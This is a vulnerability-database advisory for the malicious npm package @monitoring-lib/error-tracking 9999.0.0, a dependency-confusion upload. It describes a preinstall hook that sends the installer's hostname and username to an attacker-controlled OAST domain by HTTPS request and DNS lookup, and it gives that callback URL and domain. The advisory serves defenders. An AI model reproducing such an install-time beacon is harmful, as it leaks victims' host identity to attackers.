@monitoring-lib/error-tracking @9999.0.0
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID
MAL-2026-5540
Ecosystem
npm
Summary
On npm install , the preinstall lifecycle hook in package.json runs a Node one-liner that reads the installer's hostname ( os.hostname() ) and username ( os.userInfo().username ) and transmits them to an attacker-controlled Interactsh/OAST callback domain via two channels: an HTTPS GET request to https://d8ks495t5p5ut2enft8041g7fusnfsy5e.oast.site/?h=<hostname>&u=<username> and a DNS lookup of monitoring-lib.<hostname>.d8ks495t5p5ut2enft8041g7fusnfsy5e.oast.site . The package name uses a generic scope ( @monitoring-lib ) that does not correspond to a known publisher, and the version number 9999.0.0 is the canonical shape of a dependency-confusion attack — a public registry upload designed to override an organization's internal package of the same name. Combined, the package is a supply-chain recon beacon: any installer that resolves to this version leaks its host identity to the attacker, identifying victims whose private-registry configurations failed.
Source: amazon-inspector (491603ad44ed812c3d248696b00f7d4801a4c1dc23e4f23a3bb86f2ef499616d)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.